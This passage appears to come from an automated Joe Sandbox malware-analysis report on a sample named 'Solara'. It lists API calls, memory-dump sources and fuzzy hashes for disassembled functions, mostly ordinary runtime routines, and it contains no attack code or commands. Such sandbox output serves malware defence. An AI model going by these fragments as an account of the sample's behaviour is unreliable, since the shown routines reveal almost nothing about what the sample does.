                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0020253A,?,?,00000000), ref: 0020F129
                                                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0020253A,?,?,00000000), ref: 0020F142
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,0020253A,?,?,00000000), ref: 0020F154
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                      • String ID: :%
                                                                                                                                      • API String ID: 2551024706-86002043
                                                                                                                                      • Opcode ID: 1ec7ce4c30050453981ade5a1dbf435740d08307aef0bb95f76d09a220bfdd6a
                                                                                                                                      • Instruction ID: b348fc3a6310e5d0119820c476a28190679a889c634ced3a10dc1ea1668e4b3b
                                                                                                                                      • Opcode Fuzzy Hash: 1ec7ce4c30050453981ade5a1dbf435740d08307aef0bb95f76d09a220bfdd6a
                                                                                                                                      • Instruction Fuzzy Hash: CDF08231694219FFDF218F24ED0DB9A7B68EB01B70F244720F825EA1E0E731DE518680
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Yarn
                                                                                                                                      • String ID: e.#$|= e.#
                                                                                                                                      • API String ID: 1767336200-2959337839
                                                                                                                                      • Opcode ID: d5ca90554715e9e1c45b21997ea87e9007dbf4e6b1b09f3f5bc2306a4e157aaf
                                                                                                                                      • Instruction ID: 9362ae76a54497c4611eecbf673d89a03653722d8a16f569252d03a8db352167
                                                                                                                                      • Opcode Fuzzy Hash: d5ca90554715e9e1c45b21997ea87e9007dbf4e6b1b09f3f5bc2306a4e157aaf
                                                                                                                                      • Instruction Fuzzy Hash: A2E06D723283006FFB0CBA65AC62BBA73DCCF04B61F10002EF91A8A5C2ED10BD544A55
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002269DC,00000000,?,0023D2B0,?,?,?,00226913,00000004,InitializeCriticalSectionEx,00230D34,00230D3C), ref: 0022694D
                                                                                                                                      • GetLastError.KERNEL32(?,002269DC,00000000,?,0023D2B0,?,?,?,00226913,00000004,InitializeCriticalSectionEx,00230D34,00230D3C,00000000,?,0021BBBC), ref: 00226957
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0022697F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                      • Opcode ID: 24e2e4963285345f79f92d8042a3cb211a45ab6ae7a13ef5c807a2719b9def51
                                                                                                                                      • Instruction ID: b981261da9a75d92c35e41ecf9f10890a947f056c6354fb8c5a4ca9436b23e6b
                                                                                                                                      • Opcode Fuzzy Hash: 24e2e4963285345f79f92d8042a3cb211a45ab6ae7a13ef5c807a2719b9def51
                                                                                                                                      • Instruction Fuzzy Hash: C9E01A713A0219BBEF211FA0FC4EB6C3A59AB50B91F548420F94CA84E1DF72ECA09944
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(75E5C5C8,00000000,00000000,?), ref: 00224001
                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00224253
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00224299
                                                                                                                                      • GetLastError.KERNEL32 ref: 0022433C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                      • Opcode ID: c34052555d5c8e8a72d4a3eaf0f7f51d44e96a4ec98f24f5543f74e95478ad54
                                                                                                                                      • Instruction ID: 19997a14538c4de0858a979c975deb6978a0a57f4ffe9972e2e2eb77d4d0fc40
                                                                                                                                      • Opcode Fuzzy Hash: c34052555d5c8e8a72d4a3eaf0f7f51d44e96a4ec98f24f5543f74e95478ad54
                                                                                                                                      • Instruction Fuzzy Hash: 07D19A75D10268AFCF05DFE8E880AEDBBB9FF08314F24416AE915EB251D630A961CF50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      • Opcode ID: 0be3f57c680632c5edc14712444515e916b21027613c2c3a20ef0f367895f05e
                                                                                                                                      • Instruction ID: 3b40f7e05db38dc84b1720b0900b7cb61605440474375b1ebe885c9ac190a288
                                                                                                                                      • Opcode Fuzzy Hash: 0be3f57c680632c5edc14712444515e916b21027613c2c3a20ef0f367895f05e
                                                                                                                                      • Instruction Fuzzy Hash: CC51D271A206069FEB2A9F60C995BEA73F4EF20710F14406DEC2686291D771ECF0CB90
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002072C5
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00207395
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002073A3
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002073B1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2261580123-0
                                                                                                                                      • Opcode ID: 1e7986c926b914f8dba4bd5c86be6708f89d8f939a81e02059444ff17b03d047
                                                                                                                                      • Instruction ID: 6932ddfa13a3a226d77253f0ceb00fc9493603c2a466cdff85a35e247c48afba
                                                                                                                                      • Opcode Fuzzy Hash: 1e7986c926b914f8dba4bd5c86be6708f89d8f939a81e02059444ff17b03d047
                                                                                                                                      • Instruction Fuzzy Hash: E74104B0D143068BEB20DF24C84576EB7A9BF44320F144679D816476D3EB30F864CB91
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00204495
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002044B2
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002044D3
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00204580
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 593203224-0
                                                                                                                                      • Opcode ID: b12e884aedce72cadc0f115c47c34e39693b090d65ea80026f5c00164c567416
                                                                                                                                      • Instruction ID: a2f5edee1ee1da54a21e32d407a3106ca17c819127543ed595f7e7e3fb53fbae
                                                                                                                                      • Opcode Fuzzy Hash: b12e884aedce72cadc0f115c47c34e39693b090d65ea80026f5c00164c567416
                                                                                                                                      • Instruction Fuzzy Hash: 484179B1D103198FCB10EF98E848BAEBBB4FB58320F548229E91567392D734AD50CF91
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • GetLastError.KERNEL32 ref: 00221E2A
                                                                                                                                      • __dosmaperr.LIBCMT ref: 00221E31
                                                                                                                                      • GetLastError.KERNEL32 ref: 00221E6B
                                                                                                                                      • __dosmaperr.LIBCMT ref: 00221E72
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                      • Opcode ID: e026d7d069bf8f589e574662552f07818d7ce901069fd24adcd9d07a9d378ce4
                                                                                                                                      • Instruction ID: 95a721e49a107ad998b59e350c94c971096423cbd010f819ce805b82adf2c71c
                                                                                                                                      • Opcode Fuzzy Hash: e026d7d069bf8f589e574662552f07818d7ce901069fd24adcd9d07a9d378ce4
                                                                                                                                      • Instruction Fuzzy Hash: FF21D631624225BFCB20AFE5AC81C6BB7ACFF243647128519FC1593151D731EC708B90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6479b1ad6688c9abb620004eedd8e4f460400eea377a9b78c54eafdbe8240ec2
                                                                                                                                      • Instruction ID: d07f5df7419872cec9888869e53dc6f99496184865304930b90054f9bcad9419
                                                                                                                                      • Opcode Fuzzy Hash: 6479b1ad6688c9abb620004eedd8e4f460400eea377a9b78c54eafdbe8240ec2
                                                                                                                                      • Instruction Fuzzy Hash: 7A219F71224216EF9B20AF658C809EAB7ECFF60364B11451AF95597250EB30EDF48BE0
                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002231C6
                                                                                                                                        • Part of subcall function 0021C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0021D895,?,00000000,-00000008), ref: 0021C082
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002231FE
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0022321E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                      • Opcode ID: dfdbaf4f8a00d67a3bc6b292485f03c3b180af1a1d6b3076141d5255e9d18522
                                                                                                                                      • Instruction ID: c6daf4b9f0d2a74d85853bba612e0cae61bf6a74bf543653af9d0c204fb0404d
                                                                                                                                      • Opcode Fuzzy Hash: dfdbaf4f8a00d67a3bc6b292485f03c3b180af1a1d6b3076141d5255e9d18522
                                                                                                                                      • Instruction Fuzzy Hash: B51126B2520126BEA7126BF1BC8DCFF6AACDEA53947100615FE01D1100FFA8DF6045B0
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0020E899
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0020E8A3
                                                                                                                                      • int.LIBCPMT ref: 0020E8BA
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0020C1F6
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0020C210
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0020E914
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1383202999-0
                                                                                                                                      • Opcode ID: 3dcdf75d09317b9833ea02a4d7b419de71f907d88b7bd455af52ebc67c31cfc3
                                                                                                                                      • Instruction ID: 96642c6086ccc9a271582aff61c7b8acda9975c21afb682084788aadcd5f61f1
                                                                                                                                      • Opcode Fuzzy Hash: 3dcdf75d09317b9833ea02a4d7b419de71f907d88b7bd455af52ebc67c31cfc3
                                                                                                                                      • Instruction Fuzzy Hash: 6511E1729243199BCF05EFA4D9456BDB775AF84720F260549E411AB2D3CF70AE60CF81
                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000), ref: 0022ADB7
                                                                                                                                      • GetLastError.KERNEL32(?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?,?,?,00223CD6,00000000), ref: 0022ADC3
                                                                                                                                        • Part of subcall function 0022AE20: CloseHandle.KERNEL32(FFFFFFFE,0022ADD3,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?,?), ref: 0022AE30
                                                                                                                                      • ___initconout.LIBCMT ref: 0022ADD3
                                                                                                                                        • Part of subcall function 0022ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0022AD91,0022A2DC,?,?,00224390,?,00000000,00000000,?), ref: 0022AE08
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0022A2EF,00000000,00000001,00000000,?,?,00224390,?,00000000,00000000,?), ref: 0022ADE8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: 52c2eda6632a463cf493cbb4a12d9a8813ff67ddb8c5704cf0f8e79576f97095
                                                                                                                                      • Instruction ID: 1bf040765187c12de49108523e503f91953c96913b5ef05114f41fa94e4318fb
                                                                                                                                      • Opcode Fuzzy Hash: 52c2eda6632a463cf493cbb4a12d9a8813ff67ddb8c5704cf0f8e79576f97095
                                                                                                                                      • Instruction Fuzzy Hash: 20F0A536514129BBCF222FD5FC0C99A7F2AFF497A2B158011FE1996520DB728C70AB91
                                                                                                                                      APIs
                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00210507
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00210516
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0021051F
                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0021052C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                      • Opcode ID: 0b6a34b65c2d5d75c98ef3466b77d2ddaf6f591ea9ba62189a6f9068e181be5c
                                                                                                                                      • Instruction ID: 705b04da74523c25aefb40997117b4e1cc6ef16524ec99257403520457a5d74c
                                                                                                                                      • Opcode Fuzzy Hash: 0b6a34b65c2d5d75c98ef3466b77d2ddaf6f591ea9ba62189a6f9068e181be5c
                                                                                                                                      • Instruction Fuzzy Hash: C8F06274D1020DEBCB00DFB4EA4D99EBBF8FF1C200B918996E412E7110EB30AB449B50
                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0021B893,?,?,00000000,00000000,00000000,?), ref: 0021B9B7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
